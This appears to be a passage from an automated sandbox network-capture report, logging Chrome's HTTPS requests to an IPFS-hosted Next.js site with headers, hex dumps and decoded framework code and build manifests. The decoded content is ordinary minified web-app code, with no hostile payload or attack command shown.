                                                                                                                                                                                                                                                  Data Ascii: ltValue?"":t.defaultValue,r=null!=t.checked?t.checked:t.defaultChecked;n=K(null!=t.value?t.value:n),e._wrapperState={initialChecked:r,initialValue:n,controlled:"checkbox"===t.type||"radio"===t.type?null!=t.checked:null!=t.value}}function te(e,t){null!=(t=
                                                                                                                                                                                                                                                  2024-09-28 04:11:46 UTC1369INData Raw: 29 2c 65 7d 66 75 6e 63 74 69 6f 6e 20 6f 65 28 65 2c 74 2c 6e 2c 72 29 7b 69 66 28 65 3d 65 2e 6f 70 74 69 6f 6e 73 2c 74 29 7b 74 3d 7b 7d 3b 66 6f 72 28 76 61 72 20 6c 3d 30 3b 6c 3c 6e 2e 6c 65 6e 67 74 68 3b 6c 2b 2b 29 74 5b 22 24 22 2b 6e 5b 6c 5d 5d 3d 21 30 3b 66 6f 72 28 6e 3d 30 3b 6e 3c 65 2e 6c 65 6e 67 74 68 3b 6e 2b 2b 29 6c 3d 74 2e 68 61 73 4f 77 6e 50 72 6f 70 65 72 74 79 28 22 24 22 2b 65 5b 6e 5d 2e 76 61 6c 75 65 29 2c 65 5b 6e 5d 2e 73 65 6c 65 63 74 65 64 21 3d 3d 6c 26 26 28 65 5b 6e 5d 2e 73 65 6c 65 63 74 65 64 3d 6c 29 2c 6c 26 26 72 26 26 28 65 5b 6e 5d 2e 64 65 66 61 75 6c 74 53 65 6c 65 63 74 65 64 3d 21 30 29 7d 65 6c 73 65 7b 66 6f 72 28 6e 3d 22 22 2b 4b 28 6e 29 2c 74 3d 6e 75 6c 6c 2c 6c 3d 30 3b 6c 3c 65 2e 6c 65 6e 67
                                                                                                                                                                                                                                                  Data Ascii: ),e}function oe(e,t,n,r){if(e=e.options,t){t={};for(var l=0;l<n.length;l++)t["$"+n[l]]=!0;for(n=0;n<e.length;n++)l=t.hasOwnProperty("$"+e[n].value),e[n].selected!==l&&(e[n].selected=l),l&&r&&(e[n].defaultSelected=!0)}else{for(n=""+K(n),t=null,l=0;l<e.leng


                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                  81192.168.2.549796209.94.90.24431076C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                  2024-09-28 04:11:46 UTC747OUTGET /_next/static/qfKi0l7EhUa_QqPERmaKb/_buildManifest.js HTTP/1.1
                                                                                                                                                                                                                                                  Host: bafybeihwopeeamsw6gk3vbg3wbftvt3n2qngbzo5a4hlnpvlv4hc3vvmyy.ipfs.dweb.link
                                                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                                                  sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                  sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                  sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                  Accept: */*
                                                                                                                                                                                                                                                  Sec-Fetch-Site: same-origin
                                                                                                                                                                                                                                                  Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                  Sec-Fetch-Dest: script
                                                                                                                                                                                                                                                  Referer: https://bafybeihwopeeamsw6gk3vbg3wbftvt3n2qngbzo5a4hlnpvlv4hc3vvmyy.ipfs.dweb.link/
                                                                                                                                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                  Cookie: __cflb=02DiuHFpDhc3YAVzwBqGVx23Wx7BLmnbsd1SxZG9bHeR2
                                                                                                                                                                                                                                                  2024-09-28 04:11:46 UTC1366INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                  Date: Sat, 28 Sep 2024 04:11:46 GMT
                                                                                                                                                                                                                                                  Content-Type: text/javascript; charset=utf-8
                                                                                                                                                                                                                                                  Content-Length: 2368
                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                  access-control-allow-headers: Content-Type
                                                                                                                                                                                                                                                  access-control-allow-headers: Range
                                                                                                                                                                                                                                                  access-control-allow-headers: User-Agent
                                                                                                                                                                                                                                                  access-control-allow-headers: X-Requested-With
                                                                                                                                                                                                                                                  access-control-allow-methods: GET
                                                                                                                                                                                                                                                  access-control-allow-methods: HEAD
                                                                                                                                                                                                                                                  access-control-allow-methods: OPTIONS
                                                                                                                                                                                                                                                  access-control-allow-origin: *
                                                                                                                                                                                                                                                  access-control-expose-headers: Content-Length
                                                                                                                                                                                                                                                  access-control-expose-headers: Content-Range
                                                                                                                                                                                                                                                  access-control-expose-headers: X-Chunked-Output
                                                                                                                                                                                                                                                  access-control-expose-headers: X-Ipfs-Path
                                                                                                                                                                                                                                                  access-control-expose-headers: X-Ipfs-Roots
                                                                                                                                                                                                                                                  access-control-expose-headers: X-Stream-Output
                                                                                                                                                                                                                                                  Cache-Control: public, max-age=29030400, immutable
                                                                                                                                                                                                                                                  etag: "bafkreidsiqncwdmbtsaku6jagt4kvlz6h32ddofrp3nto5urbh7icajyra"
                                                                                                                                                                                                                                                  x-ipfs-path: /ipfs/bafybeihwopeeamsw6gk3vbg3wbftvt3n2qngbzo5a4hlnpvlv4hc3vvmyy/_next/static/qfKi0l7EhUa_QqPERmaKb/_buildManifest.js
                                                                                                                                                                                                                                                  x-ipfs-roots: bafybeihwopeeamsw6gk3vbg3wbftvt3n2qngbzo5a4hlnpvlv4hc3vvmyy,bafybeibkk2t3wa2shw62jhntzsugx2oh7gf6zlbu3gb6gdxmeuwt6wi6se,bafybeihww4l5iuauf4leipzwanhudgpdxwdltpxcn6hqqud65jpcaq33xe,bafybeigqhvk42clxkx3275tgfrsk4nxd5bgdxfnph4by2yt356lna7aaze,bafkreidsiqncwdmbtsaku6jagt4kvlz6h32ddofrp3nto5urbh7icajyra
                                                                                                                                                                                                                                                  x-ipfs-pop: rainbow-dc13-10
                                                                                                                                                                                                                                                  CF-Cache-Status: HIT
                                                                                                                                                                                                                                                  Age: 646869
                                                                                                                                                                                                                                                  2024-09-28 04:11:46 UTC74INData Raw: 41 63 63 65 70 74 2d 52 61 6e 67 65 73 3a 20 62 79 74 65 73 0d 0a 53 65 72 76 65 72 3a 20 63 6c 6f 75 64 66 6c 61 72 65 0d 0a 43 46 2d 52 41 59 3a 20 38 63 61 30 65 34 32 66 37 66 34 62 38 63 37 37 2d 45 57 52 0d 0a 0d 0a
                                                                                                                                                                                                                                                  Data Ascii: Accept-Ranges: bytesServer: cloudflareCF-RAY: 8ca0e42f7f4b8c77-EWR
                                                                                                                                                                                                                                                  2024-09-28 04:11:46 UTC1298INData Raw: 73 65 6c 66 2e 5f 5f 42 55 49 4c 44 5f 4d 41 4e 49 46 45 53 54 3d 66 75 6e 63 74 69 6f 6e 28 73 2c 63 2c 61 2c 65 2c 74 2c 6e 2c 69 2c 72 2c 66 2c 6b 2c 75 2c 68 2c 64 2c 6a 2c 62 29 7b 72 65 74 75 72 6e 7b 5f 5f 72 65 77 72 69 74 65 73 3a 7b 62 65 66 6f 72 65 46 69 6c 65 73 3a 5b 5d 2c 61 66 74 65 72 46 69 6c 65 73 3a 5b 5d 2c 66 61 6c 6c 62 61 63 6b 3a 5b 5d 7d 2c 22 2f 22 3a 5b 73 2c 22 73 74 61 74 69 63 2f 63 68 75 6e 6b 73 2f 33 36 34 35 2d 39 32 30 33 64 64 39 34 30 34 61 33 39 37 37 65 2e 6a 73 22 2c 22 73 74 61 74 69 63 2f 63 68 75 6e 6b 73 2f 34 32 35 34 2d 61 63 30 64 64 33 33 66 35 61 65 38 33 39 64 33 2e 6a 73 22 2c 22 73 74 61 74 69 63 2f 63 68 75 6e 6b 73 2f 31 35 37 33 2d 37 33 62 39 35 39 35 64 39 37 64 37 34 64 65 38 2e 6a 73 22 2c 6e 2c
                                                                                                                                                                                                                                                  Data Ascii: self.__BUILD_MANIFEST=function(s,c,a,e,t,n,i,r,f,k,u,h,d,j,b){return{__rewrites:{beforeFiles:[],afterFiles:[],fallback:[]},"/":[s,"static/chunks/3645-9203dd9404a3977e.js","static/chunks/4254-ac0dd33f5ae839d3.js","static/chunks/1573-73b9595d97d74de8.js",n,
                                                                                                                                                                                                                                                  2024-09-28 04:11:46 UTC1070INData Raw: 37 38 2d 35 37 30 66 31 39 34 62 66 39 39 31 66 33 35 66 2e 6a 73 22 2c 22 73 74 61 74 69 63 2f 63 68 75 6e 6b 73 2f 70 61 67 65 73 2f 73 74 61 6b 69 6e 67 2d 31 64 37 35 34 64 30 38 65 37 38 35 66 66 65 36 2e 6a 73 22 5d 2c 22 2f 76 33 2d 6d 69 67 72 61 74 69 6f 6e 22 3a 5b 73 2c 22 73 74 61 74 69 63 2f 63 68 75 6e 6b 73 2f 31 31 30 32 2d 61 32 39 39 65 30 65 34 61 36 32 31 61 65 61 31 2e 6a 73 22 2c 63 2c 61 2c 65 2c 69 2c 22 73 74 61 74 69 63 2f 63 68 75 6e 6b 73 2f 70 61 67 65 73 2f 76 33 2d 6d 69 67 72 61 74 69 6f 6e 2d 63 62 33 39 36 30 66 35 34 62 39 33 62 31 64 30 2e 6a 73 22 5d 2c 73 6f 72 74 65 64 50 61 67 65 73 3a 5b 22 2f 22 2c 22 2f 34 30 34 22 2c 22 2f 35 30 30 22 2c 22 2f 5f 61 70 70 22 2c 22 2f 5f 65 72 72 6f 72 22 2c 22 2f 66 61 75 63 65
                                                                                                                                                                                                                                                  Data Ascii: 78-570f194bf991f35f.js","static/chunks/pages/staking-1d754d08e785ffe6.js"],"/v3-migration":[s,"static/chunks/1102-a299e0e4a621aea1.js",c,a,e,i,"static/chunks/pages/v3-migration-cb3960f54b93b1d0.js"],sortedPages:["/","/404","/500","/_app","/_error","/fauce


                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                  82192.168.2.549799209.94.90.24431076C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                  2024-09-28 04:11:46 UTC745OUTGET /_next/static/qfKi0l7EhUa_QqPERmaKb/_ssgManifest.js HTTP/1.1
                                                                                                                                                                                                                                                  Host: bafybeihwopeeamsw6gk3vbg3wbftvt3n2qngbzo5a4hlnpvlv4hc3vvmyy.ipfs.dweb.link
                                                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                                                  sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                  sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                  sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                  Accept: */*
                                                                                                                                                                                                                                                  Sec-Fetch-Site: same-origin
                                                                                                                                                                                                                                                  Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                  Sec-Fetch-Dest: script
                                                                                                                                                                                                                                                  Referer: https://bafybeihwopeeamsw6gk3vbg3wbftvt3n2qngbzo5a4hlnpvlv4hc3vvmyy.ipfs.dweb.link/
                                                                                                                                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                  Cookie: __cflb=02DiuHFpDhc3YAVzwBqGVx23Wx7BLmnbsd1SxZG9bHeR2
                                                                                                                                                                                                                                                  2024-09-28 04:11:46 UTC1363INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                  Date: Sat, 28 Sep 2024 04:11:46 GMT
                                                                                                                                                                                                                                                  Content-Type: text/javascript; charset=utf-8
                                                                                                                                                                                                                                                  Content-Length: 77
                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                  access-control-allow-headers: Content-Type
                                                                                                                                                                                                                                                  access-control-allow-headers: Range
                                                                                                                                                                                                                                                  access-control-allow-headers: User-Agent
                                                                                                                                                                                                                                                  access-control-allow-headers: X-Requested-With
                                                                                                                                                                                                                                                  access-control-allow-methods: GET
                                                                                                                                                                                                                                                  access-control-allow-methods: HEAD
                                                                                                                                                                                                                                                  access-control-allow-methods: OPTIONS
                                                                                                                                                                                                                                                  access-control-allow-origin: *
                                                                                                                                                                                                                                                  access-control-expose-headers: Content-Length
                                                                                                                                                                                                                                                  access-control-expose-headers: Content-Range
                                                                                                                                                                                                                                                  access-control-expose-headers: X-Chunked-Output
                                                                                                                                                                                                                                                  access-control-expose-headers: X-Ipfs-Path
                                                                                                                                                                                                                                                  access-control-expose-headers: X-Ipfs-Roots
                                                                                                                                                                                                                                                  access-control-expose-headers: X-Stream-Output
                                                                                                                                                                                                                                                  Cache-Control: public, max-age=29030400, immutable
                                                                                                                                                                                                                                                  etag: "bafkreidplnfkadjprvvo3gjvwryya27xvtxumtimdu4qeyhf7yt7qaggpy"
                                                                                                                                                                                                                                                  x-ipfs-path: /ipfs/bafybeihwopeeamsw6gk3vbg3wbftvt3n2qngbzo5a4hlnpvlv4hc3vvmyy/_next/static/qfKi0l7EhUa_QqPERmaKb/_ssgManifest.js
                                                                                                                                                                                                                                                  x-ipfs-roots: bafybeihwopeeamsw6gk3vbg3wbftvt3n2qngbzo5a4hlnpvlv4hc3vvmyy,bafybeibkk2t3wa2shw62jhntzsugx2oh7gf6zlbu3gb6gdxmeuwt6wi6se,bafybeihww4l5iuauf4leipzwanhudgpdxwdltpxcn6hqqud65jpcaq33xe,bafybeigqhvk42clxkx3275tgfrsk4nxd5bgdxfnph4by2yt356lna7aaze,bafkreidplnfkadjprvvo3gjvwryya27xvtxumtimdu4qeyhf7yt7qaggpy
                                                                                                                                                                                                                                                  x-ipfs-pop: rainbow-ny5-04
                                                                                                                                                                                                                                                  CF-Cache-Status: HIT
                                                                                                                                                                                                                                                  Age: 13028480
                                                                                                                                                                                                                                                  2024-09-28 04:11:46 UTC74INData Raw: 41 63 63 65 70 74 2d 52 61 6e 67 65 73 3a 20 62 79 74 65 73 0d 0a 53 65 72 76 65 72 3a 20 63 6c 6f 75 64 66 6c 61 72 65 0d 0a 43 46 2d 52 41 59 3a 20 38 63 61 30 65 34 32 66 66 65 31 36 37 32 61 34 2d 45 57 52 0d 0a 0d 0a
                                                                                                                                                                                                                                                  Data Ascii: Accept-Ranges: bytesServer: cloudflareCF-RAY: 8ca0e42ffe1672a4-EWR
                                                                                                                                                                                                                                                  2024-09-28 04:11:46 UTC77INData Raw: 73 65 6c 66 2e 5f 5f 53 53 47 5f 4d 41 4e 49 46 45 53 54 3d 6e 65 77 20 53 65 74 2c 73 65 6c 66 2e 5f 5f 53 53 47 5f 4d 41 4e 49 46 45 53 54 5f 43 42 26 26 73 65 6c 66 2e 5f 5f 53 53 47 5f 4d 41 4e 49 46 45 53 54 5f 43 42 28 29 3b
                                                                                                                                                                                                                                                  Data Ascii: self.__SSG_MANIFEST=new Set,self.__SSG_MANIFEST_CB&&self.__SSG_MANIFEST_CB();


                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                  83192.168.2.549801209.94.90.24431076C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                  2024-09-28 04:11:46 UTC752OUTGET /_next/static/qfKi0l7EhUa_QqPERmaKb/_middlewareManifest.js HTTP/1.1
                                                                                                                                                                                                                                                  Host: bafybeihwopeeamsw6gk3vbg3wbftvt3n2qngbzo5a4hlnpvlv4hc3vvmyy.ipfs.dweb.link
                                                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                                                  sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                  sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                  sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                  Accept: */*
                                                                                                                                                                                                                                                  Sec-Fetch-Site: same-origin
                                                                                                                                                                                                                                                  Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                  Sec-Fetch-Dest: script
                                                                                                                                                                                                                                                  Referer: https://bafybeihwopeeamsw6gk3vbg3wbftvt3n2qngbzo5a4hlnpvlv4hc3vvmyy.ipfs.dweb.link/
                                                                                                                                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                  Cookie: __cflb=02DiuHFpDhc3YAVzwBqGVx23Wx7BLmnbsd1SxZG9bHeR2
                                                                                                                                                                                                                                                  2024-09-28 04:11:46 UTC1356INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                  Date: Sat, 28 Sep 2024 04:11:46 GMT
                                                                                                                                                                                                                                                  Content-Type: text/javascript; charset=utf-8
                                                                                                                                                                                                                                                  Content-Length: 92
                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                  access-control-allow-headers: Content-Type
                                                                                                                                                                                                                                                  access-control-allow-headers: Range
                                                                                                                                                                                                                                                  access-control-allow-headers: User-Agent
                                                                                                                                                                                                                                                  access-control-allow-headers: X-Requested-With
                                                                                                                                                                                                                                                  access-control-allow-methods: GET
                                                                                                                                                                                                                                                  access-control-allow-methods: HEAD
                                                                                                                                                                                                                                                  access-control-allow-methods: OPTIONS
                                                                                                                                                                                                                                                  access-control-allow-origin: *
                                                                                                                                                                                                                                                  access-control-expose-headers: Content-Length
                                                                                                                                                                                                                                                  access-control-expose-headers: Content-Range
                                                                                                                                                                                                                                                  access-control-expose-headers: X-Chunked-Output
                                                                                                                                                                                                                                                  access-control-expose-headers: X-Ipfs-Path
                                                                                                                                                                                                                                                  access-control-expose-headers: X-Ipfs-Roots
                                                                                                                                                                                                                                                  access-control-expose-headers: X-Stream-Output
                                                                                                                                                                                                                                                  Cache-Control: public, max-age=29030400, immutable
                                                                                                                                                                                                                                                  etag: "bafkreig6knatcosnyxmyfssqvzfeshuexrpibmhuhhmh6bp4hfz4dn7fti"
                                                                                                                                                                                                                                                  x-ipfs-path: /ipfs/bafybeihwopeeamsw6gk3vbg3wbftvt3n2qngbzo5a4hlnpvlv4hc3vvmyy/_next/static/qfKi0l7EhUa_QqPERmaKb/_middlewareManifest.js
                                                                                                                                                                                                                                                  x-ipfs-roots: bafybeihwopeeamsw6gk3vbg3wbftvt3n2qngbzo5a4hlnpvlv4hc3vvmyy,bafybeibkk2t3wa2shw62jhntzsugx2oh7gf6zlbu3gb6gdxmeuwt6wi6se,bafybeihww4l5iuauf4leipzwanhudgpdxwdltpxcn6hqqud65jpcaq33xe,bafybeigqhvk42clxkx3275tgfrsk4nxd5bgdxfnph4by2yt356lna7aaze,bafkreig6knatcosnyxmyfssqvzfeshuexrpibmhuhhmh6bp4hfz4dn7fti
                                                                                                                                                                                                                                                  x-ipfs-pop: rainbow-dc13-02
                                                                                                                                                                                                                                                  CF-Cache-Status: HIT
                                                                                                                                                                                                                                                  2024-09-28 04:11:46 UTC89INData Raw: 41 67 65 3a 20 31 31 35 32 37 35 33 34 0d 0a 41 63 63 65 70 74 2d 52 61 6e 67 65 73 3a 20 62 79 74 65 73 0d 0a 53 65 72 76 65 72 3a 20 63 6c 6f 75 64 66 6c 61 72 65 0d 0a 43 46 2d 52 41 59 3a 20 38 63 61 30 65 34 33 30 34 61 32 38 34 32 32 38 2d 45 57 52 0d 0a 0d 0a
                                                                                                                                                                                                                                                  Data Ascii: Age: 11527534Accept-Ranges: bytesServer: cloudflareCF-RAY: 8ca0e4304a284228-EWR
                                                                                                                                                                                                                                                  2024-09-28 04:11:46 UTC92INData Raw: 73 65 6c 66 2e 5f 5f 4d 49 44 44 4c 45 57 41 52 45 5f 4d 41 4e 49 46 45 53 54 3d 5b 5d 3b 73 65 6c 66 2e 5f 5f 4d 49 44 44 4c 45 57 41 52 45 5f 4d 41 4e 49 46 45 53 54 5f 43 42 26 26 73 65 6c 66 2e 5f 5f 4d 49 44 44 4c 45 57 41 52 45 5f 4d 41 4e 49 46 45 53 54 5f 43 42 28 29
                                                                                                                                                                                                                                                  Data Ascii: self.__MIDDLEWARE_MANIFEST=[];self.__MIDDLEWARE_MANIFEST_CB&&self.__MIDDLEWARE_MANIFEST_CB()


                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                  84192.168.2.549800209.94.90.34431076C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                  2024-09-28 04:11:46 UTC504OUTGET /_next/static/chunks/main-37e08f82b0681cde.js HTTP/1.1
                                                                                                                                                                                                                                                  Host: bafybeihwopeeamsw6gk3vbg3wbftvt3n2qngbzo5a4hlnpvlv4hc3vvmyy.ipfs.dweb.link
                                                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                  Accept: */*
                                                                                                                                                                                                                                                  Sec-Fetch-Site: none
                                                                                                                                                                                                                                                  Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                  Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                  Cookie: __cflb=02DiuHFpDhc3YAVzwBqGVx23Wx7BLmnbsd1SxZG9bHeR2
                                                                                                                                                                                                                                                  2024-09-28 04:11:46 UTC1360INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                  Date: Sat, 28 Sep 2024 04:11:46 GMT
                                                                                                                                                                                                                                                  Content-Type: text/javascript; charset=utf-8
                                                                                                                                                                                                                                                  Content-Length: 85086
                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                  access-control-allow-headers: Content-Type
                                                                                                                                                                                                                                                  access-control-allow-headers: Range
                                                                                                                                                                                                                                                  access-control-allow-headers: User-Agent
                                                                                                                                                                                                                                                  access-control-allow-headers: X-Requested-With
                                                                                                                                                                                                                                                  access-control-allow-methods: GET
                                                                                                                                                                                                                                                  access-control-allow-methods: HEAD
                                                                                                                                                                                                                                                  access-control-allow-methods: OPTIONS
                                                                                                                                                                                                                                                  access-control-allow-origin: *
                                                                                                                                                                                                                                                  access-control-expose-headers: Content-Length
                                                                                                                                                                                                                                                  access-control-expose-headers: Content-Range
                                                                                                                                                                                                                                                  access-control-expose-headers: X-Chunked-Output
                                                                                                                                                                                                                                                  access-control-expose-headers: X-Ipfs-Path
                                                                                                                                                                                                                                                  access-control-expose-headers: X-Ipfs-Roots
                                                                                                                                                                                                                                                  access-control-expose-headers: X-Stream-Output
                                                                                                                                                                                                                                                  Cache-Control: public, max-age=29030400, immutable
                                                                                                                                                                                                                                                  etag: "bafkreiaahaxlzpgo4xw6oh4nnvse2jvupr3m5jcuwmu5ki5gd5ylswcqze"
                                                                                                                                                                                                                                                  x-ipfs-path: /ipfs/bafybeihwopeeamsw6gk3vbg3wbftvt3n2qngbzo5a4hlnpvlv4hc3vvmyy/_next/static/chunks/main-37e08f82b0681cde.js
                                                                                                                                                                                                                                                  x-ipfs-roots: bafybeihwopeeamsw6gk3vbg3wbftvt3n2qngbzo5a4hlnpvlv4hc3vvmyy,bafybeibkk2t3wa2shw62jhntzsugx2oh7gf6zlbu3gb6gdxmeuwt6wi6se,bafybeihww4l5iuauf4leipzwanhudgpdxwdltpxcn6hqqud65jpcaq33xe,bafybeigaj3cwdjktvw36akiq43niv2siihkxaslemvv33lw5mhruragm5a,bafkreiaahaxlzpgo4xw6oh4nnvse2jvupr3m5jcuwmu5ki5gd5ylswcqze
                                                                                                                                                                                                                                                  x-ipfs-pop: rainbow-dc13-07
                                                                                                                                                                                                                                                  CF-Cache-Status: HIT
                                                                                                                                                                                                                                                  Age: 7455186
                                                                                                                                                                                                                                                  2024-09-28 04:11:46 UTC74INData Raw: 41 63 63 65 70 74 2d 52 61 6e 67 65 73 3a 20 62 79 74 65 73 0d 0a 53 65 72 76 65 72 3a 20 63 6c 6f 75 64 66 6c 61 72 65 0d 0a 43 46 2d 52 41 59 3a 20 38 63 61 30 65 34 33 30 34 65 34 61 33 33 35 34 2d 45 57 52 0d 0a 0d 0a
                                                                                                                                                                                                                                                  Data Ascii: Accept-Ranges: bytesServer: cloudflareCF-RAY: 8ca0e4304e4a3354-EWR
                                                                                                                                                                                                                                                  2024-09-28 04:11:46 UTC1369INData Raw: 28 73 65 6c 66 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 5f 4e 5f 45 3d 73 65 6c 66 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 5f 4e 5f 45 7c 7c 5b 5d 29 2e 70 75 73 68 28 5b 5b 31 37 39 5d 2c 7b 36 33 31 33 33 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 4f 62 6a 65 63 74 2e 64 65 66 69 6e 65 50 72 6f 70 65 72 74 79 28 74 2c 22 5f 5f 65 73 4d 6f 64 75 6c 65 22 2c 7b 76 61 6c 75 65 3a 21 30 7d 29 2c 74 2e 64 65 66 61 75 6c 74 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 65 3d 6e 75 6c 6c 3b 72 65 74 75 72 6e 7b 6d 6f 75 6e 74 65 64 49 6e 73 74 61 6e 63 65 73 3a 6e 65 77 20 53 65 74 2c 75 70 64 61 74 65 48 65 61 64 3a 66 75 6e 63 74 69 6f 6e 28 74 29 7b 76 61 72 20 72 3d 65 3d 50 72 6f 6d 69 73 65 2e 72 65 73 6f 6c 76 65
                                                                                                                                                                                                                                                  Data Ascii: (self.webpackChunk_N_E=self.webpackChunk_N_E||[]).push([[179],{63133:function(e,t){"use strict";Object.defineProperty(t,"__esModule",{value:!0}),t.default=function(){var e=null;return{mountedInstances:new Set,updateHead:function(t){var r=e=Promise.resolve
                                                                                                                                                                                                                                                  2024-09-28 04:11:46 UTC1369INData Raw: 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 72 2e 69 6e 73 65 72 74 42 65 66 6f 72 65 28 65 2c 61 29 7d 29 29 2c 61 2e 63 6f 6e 74 65 6e 74 3d 28 69 2d 75 2e 6c 65 6e 67 74 68 2b 66 2e 6c 65 6e 67 74 68 29 2e 74 6f 53 74 72 69 6e 67 28 29 7d 28 65 2c 61 5b 65 5d 7c 7c 5b 5d 29 7d 29 29 7d 7d 29 29 7d 7d 7d 2c 74 2e 69 73 45 71 75 61 6c 4e 6f 64 65 3d 6f 2c 74 2e 44 4f 4d 41 74 74 72 69 62 75 74 65 4e 61 6d 65 73 3d 76 6f 69 64 20 30 3b 76 61 72 20 72 3d 7b 61 63 63 65 70 74 43 68 61 72 73 65 74 3a 22 61 63 63 65 70 74 2d 63 68 61 72 73 65 74 22 2c 63 6c 61 73 73 4e 61 6d 65 3a 22 63 6c 61 73 73 22 2c 68 74 6d 6c 46 6f 72 3a 22 66 6f 72 22 2c 68 74 74 70 45 71 75 69 76 3a 22 68 74 74 70 2d 65 71 75 69 76 22 2c 6e 6f 4d 6f 64 75 6c 65 3a 22 6e 6f 4d 6f
                                                                                                                                                                                                                                                  Data Ascii: ction(e){return r.insertBefore(e,a)})),a.content=(i-u.length+f.length).toString()}(e,a[e]||[])}))}}))}}},t.isEqualNode=o,t.DOMAttributeNames=void 0;var r={acceptCharset:"accept-charset",className:"class",htmlFor:"for",httpEquiv:"http-equiv",noModule:"noMo
                                                                                                                                                                                                                                                  2024-09-28 04:11:46 UTC1369INData Raw: 3b 72 65 74 75 72 6e 20 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 72 2c 6e 3d 73 28 65 29 3b 69 66 28 74 29 7b 76 61 72 20 6f 3d 73 28 74 68 69 73 29 2e 63 6f 6e 73 74 72 75 63 74 6f 72 3b 72 3d 52 65 66 6c 65 63 74 2e 63 6f 6e 73 74 72 75 63 74 28 6e 2c 61 72 67 75 6d 65 6e 74 73 2c 6f 29 7d 65 6c 73 65 20 72 3d 6e 2e 61 70 70 6c 79 28 74 68 69 73 2c 61 72 67 75 6d 65 6e 74 73 29 3b 72 65 74 75 72 6e 20 63 28 74 68 69 73 2c 72 29 7d 7d 4f 62 6a 65 63 74 2e 64 65 66 69 6e 65 50 72 6f 70 65 72 74 79 28 74 2c 22 5f 5f 65 73 4d 6f 64 75 6c 65 22 2c 7b 76 61 6c 75 65 3a 21 30 7d 29 2c 74 2e 69 6e 69 74 69 61 6c 69 7a 65 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 59 2e 61 70 70 6c 79 28 74 68 69 73 2c 61 72 67 75 6d 65 6e 74 73 29 7d 2c 74 2e
                                                                                                                                                                                                                                                  Data Ascii: ;return function(){var r,n=s(e);if(t){var o=s(this).constructor;r=Reflect.construct(n,arguments,o)}else r=n.apply(this,arguments);return c(this,r)}}Object.defineProperty(t,"__esModule",{value:!0}),t.initialize=function(){return Y.apply(this,arguments)},t.
